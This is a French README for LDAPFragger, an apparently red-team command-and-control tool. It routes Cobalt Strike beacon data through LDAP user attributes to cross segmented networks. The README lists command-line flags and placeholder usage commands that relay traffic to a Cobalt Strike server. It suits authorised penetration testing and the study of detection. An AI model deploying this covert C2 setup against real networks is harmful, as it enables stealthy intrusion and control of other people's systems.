
Outil C2 routant les données de beacon Cobalt Strike via les attributs utilisateur LDAP pour un commandement et contrôle furtif dans des réseaux segmentés.
LDAPFragger est un outil de commande et de contrôle qui permet aux attaquants d'acheminer les données des beacons Cobalt Strike via LDAP en utilisant des attributs utilisateur.
Pour plus d'informations, lisez l'article de blog de lancement : http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0, mais peut fonctionner avec des frameworks .NET plus anciens ou plus récents également _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
Utilisation :
--cshost : Adresse IP ou nom d'hôte de l'instance Cobalt Strike
--csport : Port de l'interface C2 externe sur le serveur Cobalt Strike
-u : Nom d'utilisateur pour se connecter à Active Directory
-p : Mot de passe pour se connecter à Active Directory
-d : FQDN du domaine Active Directory
--ldaps : Utiliser LDAPS au lieu de LDAP
-v : Sortie détaillée
-h : Afficher ce message
Si aucun identifiant AD n'est fourni, l'authentification AD intégrée sera utilisée.
Exemple d'utilisation :

Depuis le segment réseau A, exécutez
LDAPFragger --cshost <Adresse IP Cobalt Strike> --csport <Port de l'écouteur externe>
LDAPFragger --cshost <Adresse IP Cobalt Strike> --csport <Port de l'écouteur externe> -u <nom d'utilisateur> -p <mot de passe> -d <FQDN du domaine>
Depuis le segment réseau B, exécutez
LDAPFragger
LDAPFragger -u <nom d'utilisateur> -p <mot de passe> -d <FQDN du domaine>
LDAPS peut être utilisé avec le drapeau --LDAPS, cependant, le trafic LDAP normal est également chiffré. Veuillez noter que la charge utile par défaut de Cobalt Strike sera détectée par la plupart des antivirus.